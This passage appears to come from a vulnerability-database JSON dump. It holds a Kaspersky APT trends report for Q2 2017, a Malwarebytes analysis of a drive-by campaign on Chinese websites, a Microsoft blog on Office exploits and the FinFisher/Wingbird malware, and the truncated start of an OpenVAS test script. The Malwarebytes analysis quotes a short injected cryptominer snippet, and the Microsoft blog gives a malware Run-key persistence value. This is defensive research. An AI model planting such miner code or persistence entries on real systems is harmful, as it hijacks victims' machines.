implant operating strictly in user-land. The intricate usefulness of Gray Lambert lies in its ability to orchestrate multiple sniffer victims on a network via broadcast, multicast, and unicast commands, allowing the operators to employ surgical precision in networks with many infected machines. The sniffers double as next-stage payload delivery mechanisms for an infected network. A notable feature of the Lambert campaigns is the level of precision with which targets are chosen; Gray Lambert's victimology is primarily focused on strategic verticals in Asia and Middle East. During this investigation, GReAT researchers have also discovered two additional Lambert families (Red Lambert and Brown Lambert) currently under investigation for Q3. Below is a list of report titles for reference:\n\n 1. EQUATIONVECTOR - A Generational Breakdown of the PeddleCheap Multifunctional Backdoor\n 2. The Gray Lambert \u2013 A Leap in Sophistication to User-land NOBUS Passive Implants\n\n## Korean-speaking Actors\n\nOur researchers focusing on attacks with a Korean nexus also had a very busy quarter, producing seven reports on the Lazarus group and WannaCry attacks. Most of the reports on Lazarus directly involved a sub-group we refer to as BlueNoroff. They are the arm that focuses mainly on financial gain, targeting banks, ATMs, and other \"money-makers\". We revealed to customers a previously unknown piece of malware dubbed 'Manuscrypt' used by Lazarus to target not only diplomatic targets in South Korea, but also people using virtual currency and electronic payment sites. Most recently, 'Manuscrypt' has become the primary backdoor used by the BlueNoroff sub-group to target financial institutions.\n\nWannaCry also created quite a stir in the second quarter, with our analysts producing three reports and multiple blog posts on this emerging threat. What proved most interesting to us, was the probable linkage to Lazarus group as the source of the attacks, as well as the origins of the malware. GReAT researchers were able to trace back some of its earliest usage and show that before the 'EternalBlue' exploit was added to version 2, WannaCry v1 was used in spearphishing attacks months prior. Here is a listing of our reports from Q2 on actors with a Korean nexus:\n\n 1. Manuscrypt - malware family distributed by Lazarus\n 2. Lazarus actor targets carders\n 3. Lazarus-linked ATM Malware On the Loose In South Korea\n 4. Lazarus targets electronic currency operators\n 5. WannaCry - major ransomware attack hitting businesses worldwide - early alert\n 6. WannaCry possibly tied to the Lazarus APT Group\n 7. The First WannaCry Spearphish and Module Distribution\n\n## Middle Eastern Actors\n\nWhile there wasn't much high-end activity involving Middle Eastern actors, we did produce two reports revolving around the use of a zero-day exploit (CVE-2017-0199). The most notable involved an actor we refer to as BlackOasis and their usage of the exploit in-the-wild prior to its discovery. We have previously reported on BlackOasis using other zero-days in the past; CVE-2016-4117 in May 2016, CVE-2016-0984 in June 2015, and CVE-2015-5119 in June 2015. It is believed that BlackOasis is a customer of Gamma Group and utilizes the popular 'lawful surveillance' kit FinSpy. Other than the usage of the exploit, this report was significant because it also showed one of the earliest known uses of a new version of FinSpy, which is still being analyzed by our researchers.\n\nAfter the discovery of CVE-2017-0199, a plethora of threat actors also began to leverage this exploit in their attacks. We reported to customers on the usage of this exploit by a well-known Middle Eastern actor dubbed 'OilRig'. OilRig has actively targeted many organizations in Israel with the exploit via spearphishes appearing to originate from well-known doctors within Ben Gurion University. While their execution was less than stellar, it highlighted the widespread usage of this exploit shortly after its discovery.\n\n 1. OilRig exploiting CVE-2017-0199 in new campaign\n 2. BlackOasis using Ole2Link zero day exploit in the wild\n\n## Chinese-Speaking Actors\n\nOn the Chinese speaking front, we felt it necessary to produce two reports to our customers. While Chinese speaking actors are active on a daily basis, not much has changed and we prefer to avoid producing reports on 'yet another instance of APTxx' for the sake of padding our numbers. Instead we try to focus on new and exciting campaigns that warrant special attention.\n\nOne of those reports detailed a new finding regarding a fileless version of the well-known 'HiKit' malware dubbed 'Hias'. We have reported on Hias in the past, and one of our researchers was finally able to discover the persistence mechanism used, which also allowed us to tie the activity to an actor we call 'CloudComputating'.\n\nAnother report detailed a new campaign we referred to as 'IndigoZebra'. This campaign was targeting former Soviet Republics with a wide swath of malware including Meterpreter, Poison Ivy, xDown, and a previously unknown malware called 'xCaon'. This campaign shares ties with other well-known Chinese-speaking actors, but no definitive attribution has been made at this time.\n\n 1. Updated technical analysis of Hias RAT\n 2. IndigoZebra - Intelligence preparation to high-level summits in Middle Asia\n\n## Best of the rest\n\nSometimes we find new and exciting campaigns or entirely new threat actors to report to our subscribers without being able to make an immediate or definitive determination on regional provenance. Several reports fell into this category in the last quarter. ChasingAdder is a report describing a new persistence technique that hijacked a legitimate WMI DLL for the purposes of loading a malicious payload. This activity targeted high-profile diplomatic, military, and research organizations beginning in the fall of 2016, but to date we have not been able to pinpoint the specific actor responsible.\n\nDemsty is a new piece of MacOS malware that is targeting University researchers in Hong Kong, among others. At the time of writing, we have a low confidence assessment that the campaign was conducted by Chinese-speaking actors, and thus categorize this as 'Unknown' until greater evidence comes to light.\n\nDuring Q2, the mischievous ShadowBrokers also continued their regular activities dumping multiple tools and documentation allegedly stolen from Equation Group. In April, the ShadowBrokers released another dump of information detailing the alleged targeting of SWIFT service bureaus and other banks by Equation Group. Since some of our customers are financial entities, we found it necessary to evaluate the data and provide an expert's opinion on the validity of the dump.\n\nReports in the 'unknown' category:\n\n 1. ShadowBrokers' Lost in translation leak - SWIFT attacks analysis\n 2. ChasingAdder - WMI DLL Hijacking Trojan Targeting High Profile Victims\n 3. University Researchers Located in Hong Kong Targeted with Demsty\n\n## Predictions\n\nBased on the trends we've seen over the last three months, as well as foreseeable geopolitical events, we have listed a few predictions for the upcoming quarter (Q3). As always, this isn't an exact science and some cases won't come to fruition. Analyzing current and future events and combining those with the motivations of known active actors can help organizations prepare for likely forthcoming activity:\n\n 1. Misinformation campaigns will remain a threat to countries with upcoming elections, specifically Germany and Norway, as they have been previous targets for Eastern European based actors.\n 2. 'Lawful Surveillance' tools will continue to be utilized by governments that don't have well-established Cyber Operations capabilities, mainly based out of the Middle East. Companies such as Gamma Group, Hacking Team, and NSO will continue to offer new zero-day exploits to those customers. As prices increase and exchanges thrive, new organizations and marketplaces will continue popping up.\n 3. Destructive malware disguised as ransomware will continue to be a problem. In the last quarter we've seen two instances of this, and with the continued release of tools / exploits from dumps like Vault7 and ShadowBrokers, this is going to be a new alarming trend to deal with.\n 4. In China, the past months have been marked by the dwindling economic growth, rising tensions with North Korea and the US, and increased exchanges between South Korean / Japanese / American organizations. In addition to these, the 19th Party Congress is set to be held in the fall of 2017 and according to multiple public predictions, it is likely that some major changes will happen in the leadership. It's possible that these events will have wide regional influences that could affect the way that threat actors operate in Asia, both in terms of targeting and TTPs.\n 5. Targeting energy-related companies and organizations will be on the rise. Countries such as Norway may be a top target moving forward given their control on oil and gas in the region in the buildup to an election. Saudi Arabia will also top the charts for potential targeting as they have in years past.\n 6. Lower-tier threat actors continue to increase cyber-espionage efforts and capabilities both in complexity and size. Expect more activity with varied technical capabilities coming from lesser known or previously unseen actors.\n\n## How to keep yourself protected\n\nOne of the biggest problems when it comes to leveraging threat intelligence is judging the quality of the data and how it can be used for defense. For instance, we may observe an increase in the number of fileless attacks or attacks in which all IOCs are unique or specific per victim. In such situations, having not only host-based IOCs, but also network IOCs and Yara rules that can help identify malware in all cases is very important.\n\nAnother problem comes from the fact that many threat intelligence providers have a limited world view and their data covers only a small set of threats. It's easy for an enterprise to fall into the trap of thinking that 'actor X' is not something they need to worry because their focus has been only certain countries or certain industry sectors; only to discover later that their ignorance left them blind to those attacks.\n\nAs shown by many incidents, but especially by WannaCry and ExPetr's EternalBlue-based spreading subroutines, vulnerabilities remain a key approach to infecting systems. Therefore timely patching is of utmost importance \u2013 which, being one of the most tedious IT maintenance tasks, works much better with good automation. Kaspersky Endpoint Security for Business Advanced and Kaspersky Total Security include Vulnerability &amp; Patch management components, offering convenient tools for making patching much easier, and much less time-consuming for IT staff.\n\nGiven the above, it is highly recommended that prevention (such as endpoint protection) along with advanced detection capabilities, such as a solution that can detect all types of anomalies and scrutinize suspicious files at a deeper level, be present on users' systems. The Kaspersky Anti Targeted Attack solution (KATA) matches events coming from different infrastructure levels, discerns anomalies and aggregates them into incidents, while also studying related artifacts in a safe environment of a sandbox. As with most Kaspersky products, KATA is powered by HuMachine Intelligence, which is backed by on premise and in lab-running machine learning processes coupled with real-time analyst expertise and our understanding of threat intelligence big data.\n\nThe best way to prevent attackers from finding and leveraging security holes, is to eliminate the holes altogether, including those involving improper system configurations or errors in proprietary applications. For this, Kaspersky Penetration Testing and Application Security Assessment services can become a convenient and highly effective solution, providing not only data on found vulnerabilities, but also advising on how to fix it, further strengthening corporate security.", "modified": "2017-08-08T14:00:40", "published": "2017-08-08T14:00:40", "href": "https://securelist.com/apt-trends-report-q2-2017/79332/", "id": "SECURELIST:75F0B75D28318C525992E42495D8C5EE", "title": "APT Trends report Q2 2017", "type": "securelist", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "malwarebytes": [{"lastseen": "2018-02-22T16:50:35", "bulletinFamily": "blog", "description": "During our web crawls we sometimes come across bizarre findings or patterns we haven't seen before. This was the case with a particular drive-by download attack planted on Chinese websites. While by no means advanced (it turned out to be fairly buggy), we witnessed a threat actor experimenting with several different exploits to drop malware.\n\nFor years we have cataloged thousands of Chinese websites injected with the same malicious and rudimentary VBScript code. Even to this day, you can find a countless number of sites that have been (or still are) compromised with that pattern, and most of them happen to be hosted in China.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/urlquery_results.png> \"\" )\n\nThe campaign we stumbled upon starts with sites that were compromised to load external content via scripts and iframe overlays. Although the browser's address bar shows _gusto-delivery[.]com_, there are several injected layers that expose visitors to unwanted code and malware.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/site_view1.png> \"\" )\n\nFor instance, we find a reference to a Coinhive clone_:_\n \n \n var miner = new ProjectPoi.User('LUdKfdXyeXp9sQZf1pphGOrY', 'john-doe', {\n threads: navigator.hardwareConcurrency,\n autoThreads: false,\n throttle: 0.2,\n forceASMJS: false\n });\n miner.start();\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/Coinhive_clone1.png> \"\" )\n\nWe are unsure whether this is a pure ripoff (the website template is almost identical), but one is different from the other in that the Chinese version (hosted at _ppoi[.]org_) only takes a 10 percent commission as opposed to 30 percent for Coinhive.\n \n \n \u4e5f\u5c31\u662f\u8bf4\uff0c\u60a8\u5c06\u83b7\u5f97\u6316\u77ff\u6536\u76ca\u768490%\uff0c\u4e0e\u77ff\u6c60\u4e0d\u540c\uff0c\u8fd9\u4e2a\u6536\u76ca\u662f\u56fa\u5b9a\u7684\uff0c\u4e0d\u8bba\u662f\u5426\u7206\u5757\u60a8\u90fd\u5c06\u83b7\u5f97\u8be5\u7b14\u6536\u76ca\n \u6211\u4eec\u5e0c\u671b\u4fdd\u755910%\u6765\u8865\u507f\u4e0d\u7206\u5757\u7684\u635f\u5931\uff0c\u7ef4\u6301\u670d\u52a1\u5668\u7684\u8fd0\u884c\u7b49\n \n I.e. you get 90% of the average XMR we earn. Unlike a traditional mining pool, this\n rate is fixed, regardless of actual blocks found and the luck involved finding them. \n We keep 10% for us to operate this service and to (hopefully) turn a profit.\n\nFinally, the most interesting aspect here is the redirection to a server hosting a few exploits as described in the diagram below:\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/Flow.png> \"\" )\n\nOn top of a late addition of the aforementioned VBScript similar to the ones found on other Chinese websites, we notice the inclusion of 3 exploits targeting older vulnerabilities in an ActiveX component, the Flash Player and Internet Explorer.\n\n**CVE-2008-2551**\n\nThis old CVE is a vulnerability with the C6 Messenger ActiveX control. The threat actor reused the same code already published [here](<https://www.exploit-db.com/exploits/5732/>) and simply altered the DownloadUrl to point to their malicious binary. Users (unless their browser settings have been changed) will be presented with a prompt asking them to install this piece of malware.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/CVE-2008-25511.png> \"\" )\n\n**CVE-2015-5119**\n\nThis is a Flash Player vulnerability affecting Flash up to version 18.0.0.194, which was again lifted from a proof of concept. Its implementation in this particular drive-by is somewhat unstable though and may cause the browser to crash.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/CVE-2015-51191.png> \"\" )\n\n**CVE-2016-0189**\n\nFinally a more interesting CVE, the well-known Internet Explorer God Mode, although for some unexplained reason, the code was commented out.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/CVE-2016-01891.png> \"\" )\n\nThe final payload dropped in this campaign is a DDoS bot, which we will cover in another blog post.\n\n### Conclusion\n\nAlthough we see the use of several exploits, we cannot call this an exploit kit\u2014not even an amateur one. Indeed, the domain serving the exploits appears to be static and the URIs are always the same.\n\nRegardless, it does not prevent threat actors from arranging drive-by attacks by copying and pasting various pieces of code they can find here and there. While not very effective, they may still be able to compromise some legacy systems or machines that have not been patched.\n\n### Indicators of compromise\n\nMalicious redirection\n \n \n vip.rm028[].cn\n by007[.]cn\n\nExploit domain and IP\n \n \n shiquanxian.cn\n 103.85.226.65\n\nCVE-2008-2551\n \n \n 5E3AC16B7F55CA52A7B4872758F19D09BD4994190B9D114D68CAB9F1D9D5B467\n\nCVE-2015-5119\n \n \n D53F3FE4354ACFE7BD12528C20DA513DCEFA98B1D60D939BDE32C0815014137E\n\nPayload\n \n \n 65ABED6C77CC219A090EBEF73D6A526FCCEDAA391FBFDCB4B416D0845B3D0DBC\n\nThe post [Drive-by download campaign targets Chinese websites, experiments with exploits](<https://blog.malwarebytes.com/threat-analysis/2018/02/chinese-criminal-experiments-with-exploits-in-drive-by-download-campaign/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "modified": "2018-02-22T16:00:00", "published": "2018-02-22T16:00:00", "id": "MALWAREBYTES:FD11436A13A56E314FE7438DEDAF9FBA", "href": "https://blog.malwarebytes.com/threat-analysis/2018/02/chinese-criminal-experiments-with-exploits-in-drive-by-download-campaign/", "type": "malwarebytes", "title": "Drive-by download campaign targets Chinese websites, experiments with exploits", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "mssecure": [{"lastseen": "2018-01-16T03:40:26", "bulletinFamily": "blog", "description": "The Office 365 Threat Research team has seen an uptick in the use of Office exploits in attacks across various industry sectors in recent months. In this blog, we will review several of these exploits, including a group of Office moniker exploits that attackers have used in targeted as well as crimeware attacks. We will also describe the payloads associated with these exploits andhighlight our research into a particularly sophisticated piece of malware. Finally, we will demonstrate how [Office 365 Advanced Threat Protection](<https://products.office.com/en-us/exchange/online-email-threat-protection?ocid=cx-blog-mmpc>), [Windows Defender Advanced Threat Protection](<https://www.microsoft.com/en-us/windowsforbusiness/windows-atp?ocid=cx-blog-mmpc>), and [Windows Defender Exploit Guard ](<https://blogs.technet.microsoft.com/mmpc/2017/10/23/windows-defender-exploit-guard-reduce-the-attack-surface-against-next-generation-malware?ocid=cx-blog-mmpc>)protect customers from these exploits.\n\n## Exploit attacks in Fall 2017\n\nThe discovery and public availability of a few Office exploits in the last six months led to these exploits gaining popularity among crimeware and targeted attackers alike. While crimeware attackers stick to payloads like [ransomware](<https://www.microsoft.com/en-us/wdsi/threats/ransomware>) and [info stealers](<https://blogs.technet.microsoft.com/mmpc/2017/11/06/mitigating-and-eliminating-info-stealing-qakbot-and-emotet-in-corporate-networks/>) to attain financial gain or information theft, more sophisticated attackers clearly distinguish themselves by using advanced and multi-stage implants.\n\nThe Office 365 Threat Research team has been closely monitoring these attacks. The Microsoft Threat Intelligence Center (MSTIC) backs up our threat research with premium threat intelligence services that we use to correlate and track attacks and the threat actors behind them.\n\n### CVE-2017-0199\n\n[CVE-2017-0199](<https://nvd.nist.gov/vuln/detail/CVE-2017-0199>) is a remote code execution (RCE) vulnerability in Microsoft Office allows a remote attacker to take control of a vulnerable machine if the user chooses to ignore protected view warning message. The vulnerability, which is a logic bug in the URL moniker that executes the HTA content using the _htafile_ OLE object, was fixed in [April 2017 security updates](<https://portal.msrc.microsoft.com/en-us/security-guidance/releasenotedetail/42b8fa28-9d09-e711-80d9-000d3a32fc99>).\n\n\n\n_Figure 1. CVE-2017-0199 exploit code_\n\nEver since [FireEye blogged](<https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html>) about the vulnerability, we have identified numerous attacks using this exploit. The original exploit was used in limited targeted attacks, but soon after, commodity crimeware started picking them up from the publicly available exploit generator toolkits. As shown in Figure 2, the creator and _lastModifiedBy_ attributes help identify the use of such toolkits in generating exploit documents.\n\n\n\n_Figure 2. Exploit kit identifier_\n\nA slight variation of this exploit, this time in script moniker, was also released. When activated, this exploit can launch [scriptlets](<https://msdn.microsoft.com/en-us/library/office/aa189871\\(v=office.10\\).aspx>) (which consist of HTML code and script) hosted on a remote server. A proof-of-concept (PoC) made publicly available used a Microsoft PowerPoint Slideshow (PPSX) file to activate the script moniker and execute a remote code, as shown in Figure 3.\n\n\n\n_Figure 3. PPSX activation for script moniker_\n\n### CVE-2017-8570\n\nThe [July 2017 security update](<https://portal.msrc.microsoft.com/en-us/security-guidance/releasenotedetail/f2b16606-4945-e711-80dc-000d3a32fc99>) from Microsoft included a fix for another variation of the CVE-2017-0199 exploit, [CVE-2017-8570](<https://nvd.nist.gov/vuln/detail/CVE-2017-8750>), which was discovered in URL moniker that, similar to HTA files, can launch scriptlets hosted on a remote server. Even though the vulnerability was not exploited as zero-day, the [public availability](<https://github.com/Ring0Mob/CVE-2017-8570>) of exploit toolkit created a wave of malicious PPSX attachments.\n\n### CVE-2017-8759\n\nIn September 2017, [FireEye discovered](<https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html>) another zero-day exploit used in targeted attacks. The [CVE-2017-8759 exploit](<https://blogs.technet.microsoft.com/mmpc/2017/09/12/exploit-for-cve-2017-8759-detected-and-neutralized/>) takes advantage of a code injection vulnerability in .Net Framework while parsing WSDL definition using SOAP moniker. The vulnerability was fixed in the [September 2017 security update](<https://portal.msrc.microsoft.com/en-us/security-guidance/releasenotedetail/5984735e-f651-e711-80dd-000d3a32fc99>). The original exploit used an HTA file similar to CVE-2017-0199 to execute the attacker code in vulnerable machines. This exploit piqued our interest because it delivered one of the most complex and multiple VM-layered malware, FinFisher, whose techniques we discuss in the succeeding section.\n\nThe CVE-2017-8759 exploit soon got ported to PPSX file. Figure 4 below shows an example of the exploit.\n\n\n\n_Figure 4. CVE-2017-8759 exploit_\n\n### CVE-2017-11826\n\nFinally, onSeptember 28,2017, [Qihoo 360](<https://360coresec.blogspot.dk/2017/10/new-office-0day-cve-2017-11826.html>) identified an RTF file in targeted attacks that exploited a memory corruption vulnerability in Microsoft Office. The vulnerability exists in the way Office parses objects within nested Office tags and was fixed in the [October 2017 security update](<https://portal.msrc.microsoft.com/en-us/security-guidance/releasenotedetail/313ae481-3088-e711-80e2-000d3a32fc99>). The forced address space layout randomization (ASLR) prevented the exploit from running in Office 2013 and above. Figure 5 shows the nested tags from the original exploit that led to the bug.\n\n\n\n_Figure 5. CVE-2017-11826 exploit_\n\n## Payloads\n\nExcept for the memory, corruption exploit CVE-2017-11826, the exploits discussed in this blog pull the malware payload from remote locations, which could make it difficult for antivirus and sandboxes to reliably detect these exploits. Additionally, the public availability of scripts that generate exploit templates could make it challenging for incident responders.\n\nAs cited above, these exploits were used in both commodity and targeted attacks. Attackers attempt to bypass AV engine defenses using different obfuscation techniques. Here are some of the obfuscation techniques used in attacks that we recently analyzed:\n\n * Attackers used HLFL as element type in the malicious RTF attachment. This element is not supported in RTF official specification but serves as an effective obfuscation for static detections.\n\n\n\n * Similarly, we have seen attackers using ATNREF and MEQARR elements in malicious RTF attachments.\n\n\n\nIn most of the attacks we analyzed, the exploits used PowerShell to download and execute malware payloads, which are usually crimeware samples like ransomware or info stealers.\n\n\n\n_Figure 6. PowerShell payload from the HTA file_\n\nHowever, every now and then, we stumble upon an interesting piece of malware that particularly catches our attention. One such malware is Wingbird, also known as FinFisher, which was used in one of the targeted attacks using the CVE-2017-8759 exploit.\n\n### WingBird (also known as FinFisher)\n\n[Wingbird](<https://www.microsoft.com/en-us/security/portal/threat/encyclopedia/Entry.aspx?Name=Backdoor:Win32/Wingbird.A!dha>) is an advanced piece of malware that shares characteristics with a government-grade commercial surveillance software, FinFisher. The activity group [NEODYMIUM](<https://blogs.technet.microsoft.com/mmpc/2016/12/14/twin-zero-day-attacks-promethium-and-neodymium-target-individuals-in-europe/>) is known to use this malware in their attack campaigns.\n\nThe group behind WingBird has proven to be highly capable of using zero-day exploits in their attacks, as mentioned in our [previous blog post on CVE-2017-8759](<https://blogs.technet.microsoft.com/mmpc/2017/09/12/exploit-for-cve-2017-8759-detected-and-neutralized/>). So far, we have seen the group use the exploits below in campaigns. These are mostly in line with the findings of Kaspersky Labs, which they documented in a [blog](<https://securelist.com/blackoasis-apt-and-new-targeted-attacks-leveraging-zero-day-exploit/82732/>):\n\n * CVE-2015-5119 (Adobe Flash)\n * CVE-2016-4117 (Adobe Flash)\n * CVE-2017-8759 (Microsoft Office)\n * CVE-2017-11292 (Adobe Flash)\n\nThe interesting part of this malware is the use of spaghetti code, multiple virtual machines, and lots of anti-debug and anti-analysis techniques. Due to the complexity of the threat, it could take analysts some time to completely unravel its functionality. Heres a summary of interesting tidbits, which we will expand in an upcoming detailed report on Wingbird.\n\nThe Wingbird malware goes through many stages of execution and has at least four VMs protecting the malware code. The first few stages are loaders that can probe if it is being run in virtualized or debugged environments. We found at least 12 different checks to evade the malwares execution in these environments. The most effective ones are:\n\n * Sandbox environment checks\n * Checks if the malware is executed under the root folder of a drive\n * Checks if the malware file is readable from an external source and if execution path contains the MD5 of its own contents\n\n\n\n * Fingerprinting check\n * Checks if the machine GUID, Windows product ID, and system Bios are from well-known sources\n * VM detection\n * Checks if the machine hardware IDs are _VmBus_ in case of HyperV, or _VEN_15AD_ in case of VMware, etc.\n * Debugger detection\n * Detects debugger and tries to kill it using undocumented APIs and information classes (specifically _ThreadHideFromDebugger_, _ProcessDebugPort_, _ProcessDebugObjectHandle_)\n\n\n\nThe latter stages act as an installation program that drops the following files on the disk and installs the malware based on the startup command received from the previous stage:\n\n * _ [randomName].cab_ -Encrypted configuration file\n * _ setup.cab_ - The last PE code section of the setup module; content still unknown\n * _ d3d9.dll_ -Malware loader used on system with restricted privileges; the module is protected by a VM\n * _ aepic.dll_ (or other name) - Malware loader used on admin privileged systems; executed from (and injected into) a faked service; protected by a VM\n * _ msvcr90.dll_ - Malware loader DLL injected into explorer.exe or winlogon.exe process; protected by a VM\n * _ [randomName].7z_ - Encrypted network plugin, used to spy the victim network communications\n * _ wsecedit.rar_ - Main malware dropped executable, protected by a VM\n\nIn the sample we analyzed, the command was 3, which led the malware to create a global event, _0x0A7F1FFAB12BB2_, and drop malware components under a folder located in [_%ProgramData%_](<https://www.microsoft.com/en-us/wdsi/help/folder-variables#programdata>), or in the _[%APPDATA%](<https://www.microsoft.com/en-us/wdsi/help/folder-variables#appdata>)_ folder. If the malware is running with restricted privileges, the persistence is achieved by setting the RUN key with the value below. The name of the key is taken from the encrypted configuration file.\n\n_HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run_ \n_ Value: \"{Random value taken from config file}\"_ \n_ With data: \"C:\\WINDOWS\\SYSTEM32\\RUNDLL32.EXE C:\\PROGRAMDATA\\AUDITAPP\\D3D9.DLL, CONTROL_RUN\"_\n\nIf the startup command is 2, the malware copies explorer.exe in the local installation directory, renames _d3d9.dll_ to _uxtheme.dll_, and creates a new _explorer.exe_ process that loads the malware DLL in memory using the DLL sideloading technique.\n\nAll of Wingbirds plugins are stored in its resource section and provide the malware various capabilities, including stealing sensitive information, spying on internet connection, or even diverting SSL connections.\n\nGiven the complex nature of the threat, we will provide more detailed analysis of the Wingbird protection mechanism and capabilities in an upcoming blog post.\n\n## Detecting Office exploit attacks with Office 365 ATP and Windows Defender Suite\n\nMicrosoft [Office 365 Advanced Threat Protection](<https://products.office.com/en-us/exchange/online-email-threat-protection?ocid=cx-blog-mmpc>) blocks attacks that use these exploits based on the detection of malicious behaviors. Office 365 ATP helps secure mailboxes against email attack by blocking emails with unsafe attachments, malicious links, and linked-to files leveraging time-of-click protection. SecOps personnel can see ATP behavioral detections like below in Office 365s Threat Explorer page:\n\n\n\n\n\n_Figure 7. Office 365 ATP detection_\n\nCustomers using [Windows Defender Advanced Threat Protection](<https://www.microsoft.com/en-us/windowsforbusiness/windows-atp?ocid=cx-blog-mmpc>) can also see multiple alerts raised based on the activities performed by the exploit on compromised machines. Windows Defender Advanced ATP is a post-breach solution that alerts SecOps personnel about hostile activity. Windows Defender ATP uses rich security data, advanced behavioral analytics, and machine learning to detect attacks.\n\n\n\n_Figure 8. Windows Defender ATP alert_\n\nIn addition, enterprises can block malicious documents using [Windows Defender Exploit Guard](<https://blogs.technet.microsoft.com/mmpc/2017/10/23/windows-defender-exploit-guard-reduce-the-attack-surface-against-next-generation-malware?ocid=cx-blog-mmpc>), which is part of the defense-in-depth protection in [Windows 10 Fall Creators Update](<https://blogs.windows.com/business/2017/06/27/announcing-end-end-security-features-windows-10/>). The Attack Surface Reduction (ASR) feature in Windows Defender Exploit Guard uses a set of built-in intelligence that can block malicious behaviors observed in malicious documents. ASR rules can also be turned on to block malicious attachments from being run or launched from Microsoft Outlook or webmail (such as Gmail, Hotmail, or Yahoo!).\n\n\n\n_Figure 9. Windows Defender Exploit Guard detection_\n\nCrimeware and targeted activity groups are always on the lookout for attack vectors to infiltrate systems and networks and deploy different kinds of payloads, from commodity to advanced implants. These attack vectors include Office exploits, which we observed in multiple attack campaigns. The availability of open-source and off-the-shelf exploit builders helps drive this trend.\n\nAtMicrosoft, we dont stop working to protect our customers mailboxes. Our global network of expert research teams continuously monitors the threat landscape for new malware campaigns, exploits, and attack methods. Our end-to-end defense suite includes Office 365 ATP, Windows Defender ATP, and Windows Defender Exploit Guard, among others, which work together to provide a holistic protection for individuals and enterprises.", "modified": "2017-11-21T13:46:01", "published": "2017-11-21T13:46:01", "id": "MSSECURE:A133B2DDF50F8BE904591C1BB592991A", "href": "https://cloudblogs.microsoft.com/microsoftsecure/2017/11/21/office-365-advanced-threat-protection-defense-for-corporate-networks-against-recent-office-exploit-attacks/", "type": "mssecure", "title": "Office 365 Advanced Threat Protection defense for corporate networks against recent Office exploit attacks", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2019-05-21T14:46:12", "bulletinFamily": "scanner", "description": "This host is missing a critical security update according to Microsoft\n Bulletin MS14-012.", "modified": "2019-05-20T00:00:00", "published": "2014-02-18T00:00:00", "id": "OPENVAS:1361412562310804500", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310804500", "title": "Microsoft Internet Explorer Multiple Memory Corruption Vulnerabilities (2925418)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Internet Explorer Multiple Memory Corruption Vulnerabilities (2925418)\n#\n# Authors:\n# Thanga Prakash S <tprakash@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:microsoft:ie\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.804500\");\n script_version(\"2019-05-20T11:12:48+0000\");\n script_cve_id(\"CVE-2014-0297\", \"CVE-2014-0298\", \"CVE-2014-0299\", \"CVE-2014-0302\",\n \"CVE-2014-0303\", \"CVE-2014-0304\", \"CVE-2014-0305\", \"CVE-2014-0306\",\n \"CVE-2014-0307\", \"CVE-2014-0308\", \"CVE-2014-0309\", \"CVE-2014-0311\",\n \"CVE-2014-0312\", \"CVE-2014-0313\", \"CVE-2014-0314\", \"CVE-2014-0321\",\n \"CVE-2014-0322\", \"CVE-2014-0324\");\n script_bugtraq_id(66023, 66025, 66026, 66027, 66028, 66029, 66030, 66031, 66032,\n 66033, 66034, 66035, 66036, 66037, 66038, 66039, 65551, 66040);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-20 11:12:48 +0000 (Mon, 20 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2014-02-18 16:40:06 +0530 (Tue, 18 Feb 2014)\");\n script_name(\"Microsoft Internet Explorer Multiple Memory Corruption Vulnerabilities (2925418)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security update according to Microsoft\n Bulletin MS14-012.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to, error when handling CMarkup objects and multiple\n unspecified errors.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers to execute arbitrary code,\n corrupt memory and compromise a user's system.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Internet Explorer version 6.x/7.x/8.x/9.x/10.x/11.x\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/56974\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/kb/2925418\");\n script_xref(name:\"URL\", value:\"https://technet.microsoft.com/en-us/security/bulletin/MS14-012\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"registry\");\n 